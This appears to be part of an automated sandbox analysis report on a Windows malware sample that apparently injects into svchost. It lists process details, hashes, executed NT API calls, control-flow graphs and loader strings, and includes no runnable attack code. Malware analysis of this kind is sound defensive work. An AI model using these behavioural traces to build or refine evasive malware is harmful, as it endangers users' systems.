                                                                            Path:C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe"
                                                                            Imagebase:0xcb0000
                                                                            File size:140'800 bytes
                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:9
                                                                            Start time:11:36:09
                                                                            Start date:06/12/2024
                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                            Imagebase:0x7ff6b1600000
                                                                            File size:676'768 bytes
                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Disassembly

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:1.4%
                                                                              Dynamic/Decrypted Code Coverage:4.7%
                                                                              Signature Coverage:15%
                                                                              Total number of Nodes:127
                                                                              Total number of Limit Nodes:7
                                                                              execution_graph 78272 424f23 78273 424f3c 78272->78273 78274 424f87 78273->78274 78277 424fc7 78273->78277 78279 424fcc 78273->78279 78280 42ea13 78274->78280 78278 42ea13 RtlFreeHeap 78277->78278 78278->78279 78283 42cc93 78280->78283 78282 424f97 78284 42ccad 78283->78284 78285 42ccbe RtlFreeHeap 78284->78285 78285->78282 78326 42fb13 78327 42ea13 RtlFreeHeap 78326->78327 78328 42fb28 78327->78328 78329 42bed3 78330 42bef0 78329->78330 78333 3a72df0 LdrInitializeThunk 78330->78333 78331 42bf18 78333->78331 78334 42eaf3 78337 42cc43 78334->78337 78336 42eb0e 78338 42cc60 78337->78338 78339 42cc71 RtlAllocateHeap 78338->78339 78339->78336 78340 424b93 78341 424baf 78340->78341 78342 424bd7 78341->78342 78343 424beb 78341->78343 78344 42c903 NtClose 78342->78344 78345 42c903 NtClose 78343->78345 78346 424be0 78344->78346 78347 424bf4 78345->78347 78350 42eb33 RtlAllocateHeap 78347->78350 78349 424bff 78350->78349 78286 414163 78287 41417d 78286->78287 78289 41419b 78287->78289 78292 417913 78287->78292 78290 4141e0 78289->78290 78291 4141cf PostThreadMessageW 78289->78291 78291->78290 78295 41792f 78292->78295 78293 41793e 78293->78289 78294 41795d 78297 417973 LdrLoadDll 78294->78297 78298 41798a 78294->78298 78295->78293 78295->78294 78299 42fe93 LdrLoadDll 78295->78299 78297->78298 78298->78289 78299->78294 78300 41b463 78301 41b4a7 78300->78301 78303 41b4c8 78301->78303 78304 42c903 78301->78304 78305 42c91d 78304->78305 78306 42c92e NtClose 78305->78306 78306->78303 78307 41a6e3 78308 41a6fb 78307->78308 78310 41a755 78307->78310 78308->78310 78311 41e673 78308->78311 78312 41e699 78311->78312 78316 41e793 78312->78316 78317 42fb53 RtlAllocateHeap RtlFreeHeap 78312->78317 78314 41e731 78314->78316 78318 42bf23 78314->78318 78316->78310 78317->78314 78319 42bf3d 78318->78319 78322 3a72c0a 78319->78322 78320 42bf69 78320->78316 78323 3a72c11 78322->78323 78324 3a72c1f LdrInitializeThunk 78322->78324 78323->78320 78324->78320 78325 3a72b60 LdrInitializeThunk 78351 401ad9 78352 401ae0 78351->78352 78355 42ff83 78352->78355 78358 42e5c3 78355->78358 78359 42e5e9 78358->78359 78370 407323 78359->78370 78361 42e5ff 78369 401b75 78361->78369 78373 41b273 78361->78373 78363 42e61e 78366 42e633 78363->78366 78388 42cce3 78363->78388 78384 428463 78366->78384 78367 42e64d 78368 42cce3 ExitProcess 78367->78368 78368->78369 78391 4165d3 78370->78391 78372 407330 78372->78361 78374 41b29f 78373->78374 78402 41b163 78374->78402 78377 41b2e4 78379 41b300 78377->78379 78382 42c903 NtClose 78377->78382 78378 41b2cc 78380 41b2d7 78378->78380 78381 42c903 NtClose 78378->78381 78379->78363 78380->78363 78381->78380 78383 41b2f6 78382->78383 78383->78363 78385 4284c4 78384->78385 78387 4284d1 78385->78387 78413 418783 78385->78413 78387->78367 78389 42ccfd 78388->78389 78390 42cd0e ExitProcess 78389->78390 78390->78366 78392 4165f0 78391->78392 78394 416609 78392->78394 78395 42d383 78392->78395 78394->78372 78397 42d39d 78395->78397 78396 42d3cc 78396->78394 78397->78396 78398 42bf23 LdrInitializeThunk 78397->78398 78399 42d42c 78398->78399 78400 42ea13 RtlFreeHeap 78399->78400 78401 42d445 78400->78401 78401->78394 78403 41b259 78402->78403 78404 41b17d 78402->78404 78403->78377 78403->78378 78408 42bfc3 78404->78408 78407 42c903 NtClose 78407->78403 78409 42bfdd 78408->78409 78412 3a735c0 LdrInitializeThunk 78409->78412 78410 41b24d 78410->78407 78412->78410 78415 4187ad 78413->78415 78414 418cbb 78414->78387 78415->78414 78421 413de3 78415->78421 78417 4188da 78417->78414 78418 42ea13 RtlFreeHeap 78417->78418 78419 4188f2 78418->78419 78419->78414 78420 42cce3 ExitProcess 78419->78420 78420->78414 78425 413e03 78421->78425 78423 413e6c 78423->78417 78424 413e62 78424->78417 78425->78423 78426 41b583 RtlFreeHeap LdrInitializeThunk 78425->78426 78426->78424 78427 418ed8 78428 42c903 NtClose 78427->78428 78429 418ee2 78428->78429

                                                                              Executed Functions

                                                                              Function 00417913 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 119 417913-41793c call 42f5f3 123 417942-417950 call 42fbf3 119->123 124 41793e-417941 119->124 127 417960-417971 call 42e093 123->127 128 417952-41795d call 42fe93 123->128 133 417973-417987 LdrLoadDll 127->133 134 41798a-41798d 127->134 128->127 133->134
                                                                              APIs
                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417985
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Load
                                                                              • String ID:
                                                                              • API String ID: 2234796835-0
                                                                              • Opcode ID: 1691cc531efa4f726ca024597818dcdd32949c22011164301577cf2829968642
                                                                              • Instruction ID: af326da7c132db295e391ced85ce7770f3b587b3f31b4282422e345026d71ec0
                                                                              • Opcode Fuzzy Hash: 1691cc531efa4f726ca024597818dcdd32949c22011164301577cf2829968642
                                                                              • Instruction Fuzzy Hash: C50152B1E4010DABDF10DAA5DC42FDEB778AB14308F4041A6F90897241F679EB488B95
                                                                              Function 0042C903 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 140 42c903-42c93c call 4046f3 call 42db83 NtClose
                                                                              APIs
                                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C937
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID:
                                                                              • API String ID: 3535843008-0
                                                                              • Opcode ID: 46584140032555b5b69e47656707a814a80bac78df92ade9faa821afa92411cb
                                                                              • Instruction ID: cb036ad0cdd716a926f083ad66e86339c7f4d5c2c0d3a14b9e6433a91f40aa26
                                                                              • Opcode Fuzzy Hash: 46584140032555b5b69e47656707a814a80bac78df92ade9faa821afa92411cb
                                                                              • Instruction Fuzzy Hash: 07E04F752006147BC610EA5AEC01F9B775CDBC5714F404419FB48A7281C6B5791186F8
                                                                              Function 03A735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 156 3a735c0-3a735cc LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: ebce7f13fa05659ffeff7f52b65f0bbfe17cb251d2be97d1ebc7546275e37624
                                                                              • Instruction ID: 8be3f98a60af97975ec109fd72819471920c05d00907bd7c21b7e5f0758742fa
                                                                              • Opcode Fuzzy Hash: ebce7f13fa05659ffeff7f52b65f0bbfe17cb251d2be97d1ebc7546275e37624
                                                                              • Instruction Fuzzy Hash: 1290023160550802D100B2584554746500A87D0301FA6C412A042456CD8B998A5165B2
                                                                              Function 03A72B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 154 3a72b60-3a72b6c LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 8d0f7406ee9ccafca5a2668ad6899c7002d2a07bf6a5384c6dffbe39a2afeaba
                                                                              • Instruction ID: f2f3aed07c35dfcbf5890919c288cb173e9f7752dfdc21db169de1d2204c02dc
                                                                              • Opcode Fuzzy Hash: 8d0f7406ee9ccafca5a2668ad6899c7002d2a07bf6a5384c6dffbe39a2afeaba
                                                                              • Instruction Fuzzy Hash: 43900261202404034105B2584454656800F87E0301B96C022E1014594DCA2989916135
                                                                              Function 03A72DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 155 3a72df0-3a72dfc LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 334d6813db9daf9f5c216bef16ef87c1c2013ed93ad0fbf0ae15e470e99e1be9
                                                                              • Instruction ID: 7e6c41b1e2a895b3658c0bbefc5c344f7b2255cc5c1d8d85d620e24d36ff4704
                                                                              • Opcode Fuzzy Hash: 334d6813db9daf9f5c216bef16ef87c1c2013ed93ad0fbf0ae15e470e99e1be9
                                                                              • Instruction Fuzzy Hash: DB90023120140813D111B2584544747400E87D0341FD6C413A042455CD9B5A8A52A131
                                                                              Function 00418783 Relevance: .4, Instructions: 435COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: abc7424243bdd5187e45cd481ff0bb7572368b3398b4de36241f08ace9b41e6e
                                                                              • Instruction ID: 2449cd8cea76a8d29eff5d572b5a5a420931330bfacb590d528125b37f1bcbd6
                                                                              • Opcode Fuzzy Hash: abc7424243bdd5187e45cd481ff0bb7572368b3398b4de36241f08ace9b41e6e
                                                                              • Instruction Fuzzy Hash: B3F1B3B0E0421AAFDF24DB64CC85AFFB778AF44304F1482AEE515A7241DB746A81CF95
                                                                              Function 004140DE Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 162COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 4140de-4140e1 1 4140e4-4140ee 0->1 2 414138-414142 0->2 5 4140f0 1->5 6 414126-41412c 1->6 3 414144-414157 2->3 4 41419c-4141cd call 4046a3 call 425063 2->4 9 41418c-41419b call 417913 3->9 28 4141ed-4141f3 4->28 29 4141cf-4141de PostThreadMessageW 4->29 8 4140f1-414109 5->8 6->9 10 41412e-414131 6->10 13 41410c 8->13 9->4 14 414133-414134 10->14 15 4140be-4140cc 10->15 20 41410d-414112 13->20 14->2 17 41409d-4140ac 15->17 18 4140ce-4140dd 15->18 26 414051-414052 17->26 27 414054-414075 17->27 18->0 18->20 24 414114-414115 20->24 25 4140ba-4140bc 20->25 24->6 25->13 25->15 26->27 31 414077-414078 27->31 32 414086-414094 27->32 29->28 30 4141e0-4141ea 29->30 30->28 31->8 33 41407a-414084 31->33 32->17 33->32
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 174EBI30$174EBI30
                                                                              • API String ID: 0-962170130
                                                                              • Opcode ID: 62086ea6164a6b55162337466ac6d99804c49254ae63c5d10560bf1a207cbe4b
                                                                              • Instruction ID: 3734ddf9b67ff786c0daef5b36f05ed51fcebabd7f310d1d9df2a0438136e3ca
                                                                              • Opcode Fuzzy Hash: 62086ea6164a6b55162337466ac6d99804c49254ae63c5d10560bf1a207cbe4b
                                                                              • Instruction Fuzzy Hash: 0E4152718013657BC7029FB8CC849DBBF78EE927A4718015EEA409F353E22989C7CB85
                                                                              Function 00414119 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71threadwindowCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 34 414119-414124 35 414126-41412c 34->35 36 41418d-41419b call 417913 34->36 38 41418c 35->38 39 41412e-414131 35->39 46 41419c-4141cd call 4046a3 call 425063 36->46 38->36 41 414133-414134 39->41 42 4140be-4140cc 39->42 43 414138-414142 41->43 44 41409d-4140ac 42->44 45 4140ce-4140dd 42->45 43->46 47 414144-414157 43->47 54 414051-414052 44->54 55 414054-414075 44->55 49 41410d-414112 45->49 50 4140de-4140e1 45->50 66 4141ed-4141f3 46->66 67 4141cf-4141de PostThreadMessageW 46->67 47->38 56 414114-414115 49->56 57 4140ba-4140bc 49->57 50->43 52 4140e4-4140ee 50->52 52->35 59 4140f0 52->59 54->55 61 414077-414078 55->61 62 414086-414094 55->62 56->35 57->42 58 41410c 57->58 58->49 63 4140f1-414109 59->63 61->63 65 41407a-414084 61->65 62->44 63->58 65->62 67->66 68 4141e0-4141ea 67->68 68->66
                                                                              APIs
                                                                              • PostThreadMessageW.USER32(174EBI30,00000111,00000000,00000000), ref: 004141DA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostThread
                                                                              • String ID: 174EBI30$174EBI30
                                                                              • API String ID: 1836367815-962170130
                                                                              • Opcode ID: 4ecf56fba355219f401ddbbca44f987cd04b3eaaab059dd1a3329575f73ce29d
                                                                              • Instruction ID: 35238bee879f9cb4b8c33a7d52a63e84c9799adef20dca56b86e1aa432f083fb
                                                                              • Opcode Fuzzy Hash: 4ecf56fba355219f401ddbbca44f987cd04b3eaaab059dd1a3329575f73ce29d
                                                                              • Instruction Fuzzy Hash: 42113AB6E012147AD711AA908C829EF773CEA927B4B10416AFA14E7241E63C4E824BE5
                                                                              Function 00414163 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 69 414163-414195 call 42eab3 call 42f4c3 74 41419b-4141cd call 4046a3 call 425063 69->74 75 414196 call 417913 69->75 81 4141ed-4141f3 74->81 82 4141cf-4141de PostThreadMessageW 74->82 75->74 82->81 83 4141e0-4141ea 82->83 83->81
                                                                              APIs
                                                                              • PostThreadMessageW.USER32(174EBI30,00000111,00000000,00000000), ref: 004141DA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostThread
                                                                              • String ID: 174EBI30$174EBI30
                                                                              • API String ID: 1836367815-962170130
                                                                              • Opcode ID: 4846da65e6cecb9ba5e53dbb1fdfa6a66c03f359dfcd8300b4ab8b61d39b8611
                                                                              • Instruction ID: eabf58b107c7c6da68bb626667c27e82debd11fa10f39ea43f99fe1032a0b2d9
                                                                              • Opcode Fuzzy Hash: 4846da65e6cecb9ba5e53dbb1fdfa6a66c03f359dfcd8300b4ab8b61d39b8611
                                                                              • Instruction Fuzzy Hash: 0F0104B5D0111C7ADB10AAE19C81DEFBB7CEF41398F448069FA04B7241D6784F468BA5
                                                                              Function 0042CC93 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 84 42cc93-42ccd4 call 4046f3 call 42db83 RtlFreeHeap
                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CCCF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeHeap
                                                                              • String ID: dfA
                                                                              • API String ID: 3298025750-2195916745
                                                                              • Opcode ID: c037948d9f93848298b9a3e15d9612d9743a7ffaddaf356af887b74fbf4664e6
                                                                              • Instruction ID: 9badaf320af6d19ba30922152393b4c4b817bbc5f8a679b733ed37b1423509a0
                                                                              • Opcode Fuzzy Hash: c037948d9f93848298b9a3e15d9612d9743a7ffaddaf356af887b74fbf4664e6
                                                                              • Instruction Fuzzy Hash: 1AE092B22002047BC614EE59DC41FAB77ADEFC5714F000419FA08A7241D774B910C7B8
                                                                              Function 00417993 Relevance: 1.6, APIs: 1, Instructions: 117libraryloaderCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 98 417993-4179a8 99 417951-417957 98->99 100 4179aa-4179b0 98->100 103 41795d-417971 call 42e093 99->103 104 417958 call 42fe93 99->104 101 4179b2-4179dc 100->101 102 4179dd 100->102 101->102 106 417989 102->106 107 4179df-4179e8 102->107 109 41798a-41798d 103->109 116 417973-417987 LdrLoadDll 103->116 104->103 106->109 110 4179ea-417a1e 107->110 111 417a4c-417a4f 107->111 114 417ab1-417ace call 42b8c3 111->114 115 417a51-417a57 111->115 115->114 116->109
                                                                              APIs
                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417985
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Load
                                                                              • String ID:
                                                                              • API String ID: 2234796835-0
                                                                              • Opcode ID: a09e5713e9d6b45433918cc3a871e07cdb4f2e923259d934ad70dc4dfbac3a66
                                                                              • Instruction ID: 8e2e7eca41e65fd1a7cba35ee64e9ef6a7c9e77ccfa9966d1d506597efe0b44c
                                                                              • Opcode Fuzzy Hash: a09e5713e9d6b45433918cc3a871e07cdb4f2e923259d934ad70dc4dfbac3a66
                                                                              • Instruction Fuzzy Hash: F031DEF6648206FAC711DB749C42FCBBFB8EB41300F14426BE8098B142E634D54A87E9
                                                                              Function 0042CC43 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 135 42cc43-42cc87 call 4046f3 call 42db83 RtlAllocateHeap
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(?,0041E731,?,?,00000000,?,0041E731,?,?,?), ref: 0042CC82
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: 1e5971ee8760370d2dffdb4a0dfdf9e4f37099d36bec83528a813842de99e206
                                                                              • Instruction ID: b2575036bf5dcaf5ff4b630ad3bd5a7365a46971e8e9f3b7bb08ed937dad50fb
                                                                              • Opcode Fuzzy Hash: 1e5971ee8760370d2dffdb4a0dfdf9e4f37099d36bec83528a813842de99e206
                                                                              • Instruction Fuzzy Hash: AAE06DB16002187BD714EF59EC41F9B77ACEFC6714F00441AFA09A7281D670B91086B8
                                                                              Function 0042CCE3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 145 42cce3-42cd1c call 4046f3 call 42db83 ExitProcess
                                                                              APIs
                                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,2CB6EB11,?,?,2CB6EB11), ref: 0042CD17
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExitProcess
                                                                              • String ID:
                                                                              • API String ID: 621844428-0
                                                                              • Opcode ID: 1d795ddcb259808af3833f40a7934c66429373065a909e14572eba194b240543
                                                                              • Instruction ID: 2142ba6bb06545a36fbe1fcd062f4bba4f286f26750a8e7fd8a17f6b67c315a7
                                                                              • Opcode Fuzzy Hash: 1d795ddcb259808af3833f40a7934c66429373065a909e14572eba194b240543
                                                                              • Instruction Fuzzy Hash: 34E086712006187BC510EA6ADC41FDBB75DDFC5724F014519FA08A7245CAB5B91187F4
                                                                              Function 03A72C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 150 3a72c0a-3a72c0f 151 3a72c11-3a72c18 150->151 152 3a72c1f-3a72c26 LdrInitializeThunk 150->152
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 52fc328b12e02d0848c86f9ef43994524745637387dbef4d8dbd7cdaff7024fe
                                                                              • Instruction ID: 6f5e2efa675efa3c8a7ba8ee2e8f84cee8cd93609338ab83b39bb35e1f488e02
                                                                              • Opcode Fuzzy Hash: 52fc328b12e02d0848c86f9ef43994524745637387dbef4d8dbd7cdaff7024fe
                                                                              • Instruction Fuzzy Hash: 6AB09B719015C5C5DA11F7604A4C717790967D0701F5AC477D3030645E473DC5D1E175

                                                                              Non-executed Functions

                                                                              Function 03AB2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-2160512332
                                                                              • Opcode ID: e0297197d5d3159490b7059e4d16ba47fe15b0b164a897bb4555a7dff4a69f31
                                                                              • Instruction ID: 3085a0817375a896473837cc336847bf042aed95b42707ce3926013e328532a8
                                                                              • Opcode Fuzzy Hash: e0297197d5d3159490b7059e4d16ba47fe15b0b164a897bb4555a7dff4a69f31
                                                                              • Instruction Fuzzy Hash: 5D926B75604341ABD720DF24C984BAAB7FCBB84754F084D2FFA949B292D774E844CB92
                                                                              Function 03A268B8 Relevance: 19.0, Strings: 15, Instructions: 249COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-3089669407
                                                                              • Opcode ID: 9006e9db255b38701ac9f4f8dbe055bafcd4fdb90fe68eb63229728c6787e922
                                                                              • Instruction ID: 4cdf410707c7df4adb26691de4961464925a392cee14cac0e036656063747780
                                                                              • Opcode Fuzzy Hash: 9006e9db255b38701ac9f4f8dbe055bafcd4fdb90fe68eb63229728c6787e922
                                                                              • Instruction Fuzzy Hash: D48105B2D022187F9B21FB98EED4DEEB7BDAB19654B044527B910F7514D720ED048BA0
                                                                              Function 03A68620 Relevance: 19.0, Strings: 15, Instructions: 223COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • IDwIDw@4Dw@4Dw, xrefs: 03AA5341, 03AA534D
                                                                              • 8, xrefs: 03AA52E3
                                                                              • Critical section address., xrefs: 03AA5502
                                                                              • Thread identifier, xrefs: 03AA553A
                                                                              • Critical section debug info address, xrefs: 03AA541F, 03AA552E
                                                                              • undeleted critical section in freed memory, xrefs: 03AA542B
                                                                              • Address of the debug info found in the active list., xrefs: 03AA54AE, 03AA54FA
                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 03AA54CE
                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 03AA5543
                                                                              • double initialized or corrupted critical section, xrefs: 03AA5508
                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 03AA54E2
                                                                              • corrupted critical section, xrefs: 03AA54C2
                                                                              • Invalid debug info address of this critical section, xrefs: 03AA54B6
                                                                              • Critical section address, xrefs: 03AA5425, 03AA54BC, 03AA5534
                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 03AA540A, 03AA5496, 03AA5519
                                                                              Memory Dump Source
